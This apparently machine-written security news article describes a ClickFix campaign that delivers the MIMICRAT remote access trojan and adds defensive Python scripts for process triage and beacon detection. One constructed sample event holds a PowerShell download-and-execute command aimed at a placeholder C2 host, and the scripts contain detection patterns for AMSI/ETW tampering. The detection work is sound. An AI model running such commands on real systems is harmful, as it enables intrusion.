Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

A New Malware Campaign Abuses Compromised Sites to Deploy MIMICRAT Remote Access Trojan



A new malware campaign has been discovered that abuses compromised websites to deploy a previously undocumented remote access trojan (RAT) dubbed MIMICRAT. The campaign shows a high degree of operational sophistication and broad, opportunistic targeting.

  • MALWARE CAMPAIGN: a new ClickFix campaign exploits compromised legitimate websites to deploy a remote access trojan (RAT).
  • MIMICRAT (Astarion RAT) is a custom C++ RAT with post-exploitation capabilities; the compromised sites used to deliver it span multiple industries and geographies.
  • The campaign uses a multi-stage PowerShell chain to bypass security measures before dropping shellcode.
  • Victims span multiple geographies, including a US university and Chinese-speaking users, suggesting broad opportunistic targeting.
  • The end goal is suspected to be ransomware deployment or data exfiltration.



  • A newly reported ClickFix campaign exploits compromised legitimate websites to deploy a previously undocumented remote access trojan (RAT) called MIMICRAT, also known as Astarion RAT. The campaign demonstrates a high level of operational sophistication, with compromised sites spanning multiple industries and geographies serving as delivery infrastructure.

    According to Elastic Security Labs, the enterprise search and cybersecurity company that discovered this campaign, it involves a multi-stage PowerShell chain that bypasses ETW (Event Tracing for Windows) and AMSI (Antimalware Scan Interface) before dropping a Lua-scripted shellcode loader. The final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic.

    MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. This malware has been found to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT.

    The entry point into this infection sequence is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code responsible for loading an externally hosted PHP script. The PHP script proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue.

    This, in turn, leads to the execution of a PowerShell command that contacts a command-and-control (C2) server to fetch a second-stage PowerShell script, which patches Windows event logging (ETW) and antivirus scanning (AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts shellcode and executes it in memory, delivering MIMICRAT.
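    The chain above leaves a distinctive trail in process-creation telemetry: a shell spawned straight from explorer.exe after a paste into the Run dialog, a command line carrying a download cradle or an encoded command, and a second stage that references AMSI and ETW APIs. The following script is an added example of how a defender might triage such events; it is not Elastic's or Huntress's tooling. The event field names (parent_image, image, command_line) are an assumption loosely modelled on Sysmon Event ID 1, and every host and path in the sample data is a constructed placeholder, not a real indicator from the campaign.

```python
"""Heuristic triage of Windows process-creation events for a ClickFix-style
chain: explorer.exe spawns a shell (Run dialog paste), the shell pulls a
second stage from a remote host, and that stage names AMSI/ETW APIs.
Added example; event field names are an assumption modelled on Sysmon
Event ID 1, and all hosts/paths in SAMPLE_EVENTS are constructed placeholders.
"""
import base64
import binascii
import re

RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Common PowerShell download-cradle verbs and aliases.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|iex|irm)\b|invoke-webrequest|invoke-restmethod|invoke-expression"
    r"|downloadstring|net\.webclient",
    re.IGNORECASE,
)
# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# Strings that commonly appear in AMSI / ETW patching stages.
AMSI_ETW_TAMPER = re.compile(
    r"amsi\.dll|AmsiScanBuffer|amsiInitFailed|EtwEventWrite", re.IGNORECASE
)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script text behind -EncodedCommand, or '' when the
    argument is absent or is not valid base64 / UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def score_event(ev):
    """Return (score, reasons) for one event. Each matched heuristic adds one
    point; the encoded command is decoded so strings hidden behind -enc count."""
    reasons = []
    parent = _basename(ev.get("parent_image", ""))
    image = _basename(ev.get("image", ""))
    raw = ev.get("command_line", "")
    text = raw + "\n" + decode_encoded_command(raw)
    if parent in RUN_DIALOG_PARENTS and image in SHELLS:
        reasons.append("shell spawned directly by explorer.exe (Run dialog paste pattern)")
    if image in SHELLS and (DOWNLOAD_CRADLE.search(text) or ENCODED_ARG.search(raw)):
        reasons.append("download cradle or encoded command in shell invocation")
    if AMSI_ETW_TAMPER.search(text):
        reasons.append("AMSI/ETW tampering strings (raw or decoded command line)")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return the events whose score reaches the threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return hits


# Constructed second stage for the sample: it only names the APIs a detection
# keys on and patches nothing.
_STAGE2 = 'Write-Host "placeholder referencing AmsiScanBuffer and EtwEventWrite"'
_STAGE2_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed; c2.example.invalid is a placeholder host
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iex (iwr https://c2.example.invalid/stage2)"'},
    {"pid": 4188, "parent_image": PS, "image": PS,
     "command_line": "powershell -enc " + _STAGE2_ENC},
    {"pid": 5001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "command_line": "notepad++.exe notes.txt"},
    {"pid": 5203, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

    The threshold of two independent signals keeps a lone administrator running an encoded command out of the alert queue while still catching the paste-into-Run pattern; in a real deployment the same scoring would be fed from EDR or Sysmon data and enriched with the RunMRU registry history that the Run dialog leaves behind.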

    The Trojan communicates with the C2 server over HTTPS and accepts two dozen commands covering process and file-system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. The lure supports 17 languages, with its content localized dynamically according to the victim's browser language settings to broaden the campaign's reach.
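    Because the implant's HTTPS traffic is shaped to look like web analytics, signature matching on the URL alone is weak; what analytics traffic does not normally do is recur at a near-constant interval from one client. The script below is an added example of a periodicity check over proxy logs and is not Elastic's detection logic. The log format is an assumption (one record per line: timestamp, client IP, host:port, method, path, status, bytes), the sample log is constructed, and c2.example.invalid is a placeholder host rather than a real indicator.

```python
"""Beacon-periodicity check over web-proxy logs for C2 traffic that hides
behind analytics-looking HTTPS requests. Added example; the log format is an
assumption and the sample data is constructed (c2.example.invalid is a
placeholder host).
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def parse_line(line):
    """Parse one record of the assumed proxy format into a dict."""
    ts, src, dst, method, path, status, nbytes = line.split()
    host, port = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "src": src, "host": host,
            "port": int(port), "method": method, "path": path,
            "status": int(status), "bytes": int(nbytes)}


def find_beacons(log_text, min_events=8, max_cv=0.15):
    """Group requests by (client, host, port) and flag pairs whose inter-request
    gaps are nearly constant: coefficient of variation (stdev / mean) at or
    below max_cv across at least min_events requests. Human browsing gives
    bursty gaps with a CV well above 1; a sleep-plus-small-jitter beacon does not."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            r = parse_line(line)
            by_pair[(r["src"], r["host"], r["port"])].append(r)
    findings = []
    for (src, host, port), recs in by_pair.items():
        if len(recs) < min_events:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({"src": src, "host": host, "port": port,
                             "count": len(recs), "mean_interval_s": round(mean, 1),
                             "cv": round(cv, 3),
                             "paths": sorted({r["path"].split("?")[0] for r in recs})})
    return findings


def build_sample_log():
    """Constructed log: one client POSTs to an analytics-looking path every
    ~60 s with a few seconds of jitter, and browses a normal site irregularly."""
    t0 = datetime(2026, 2, 20, 9, 0, 0)
    lines = []
    t = t0
    for jitter in (0, 1, -1, 2, 0, -2, 1, 0, 1, -1, 0, 2):
        t += timedelta(seconds=60 + jitter)
        lines.append(f"{t.isoformat()} 10.0.0.15 c2.example.invalid:443 "
                     f"POST /collect?v=1&t=pageview 200 412")
    t = t0
    for gap in (5, 300, 12, 40, 900, 3, 75, 1800, 20, 60, 7, 250):
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} 10.0.0.15 www.example.com:443 "
                     f"GET /news/{gap} 200 {1000 + gap}")
    return "\n".join(sorted(lines))


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

    Legitimate software (update checkers, genuine analytics SDKs) also beacons on a schedule, so a hit from this check is a lead rather than a verdict: pair it with destination age and reputation, the client's user agent, and whether the same host is contacted by other clients in the estate before escalating.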

    Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting. Researchers suspect the end goal of this attack is ransomware deployment or data exfiltration.

    The ClickFix campaign highlights the operational sophistication and global reach of malware campaigns. It also underscores the importance of staying vigilant against such threats and ensuring robust security measures are in place to prevent similar attacks from occurring.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-New-Malware-Campaign-Abuses-Compromised-Sites-to-Deploy-MIMICRAT-Remote-Access-Trojan-ehn.shtml

  • https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html

  • https://www.newsbreak.com/news/4503486658926-clickfix-campaign-abuses-compromised-sites-to-deploy-mimicrat-rat

  • https://cyberpress.org/matanbuchus-3-0-deploys-astarionrat/

  • https://www.scworld.com/brief/new-astarionrat-spread-via-matanbuchus-3-0-intrusion

  • https://www.cybermaterial.com/p/clickfix-uses-hacked-sites-for-mimicrat

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://attack.mitre.org/groups/

  • https://thehackernews.com/2025/07/hackers-leverage-microsoft-teams-to.html

  • https://cybersecsentinel.com/matanbuchus-3-0-campaign-exploits-quick-assist-and-teams-for-initial-access/


  • Published: Fri Feb 20 09:52:22 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.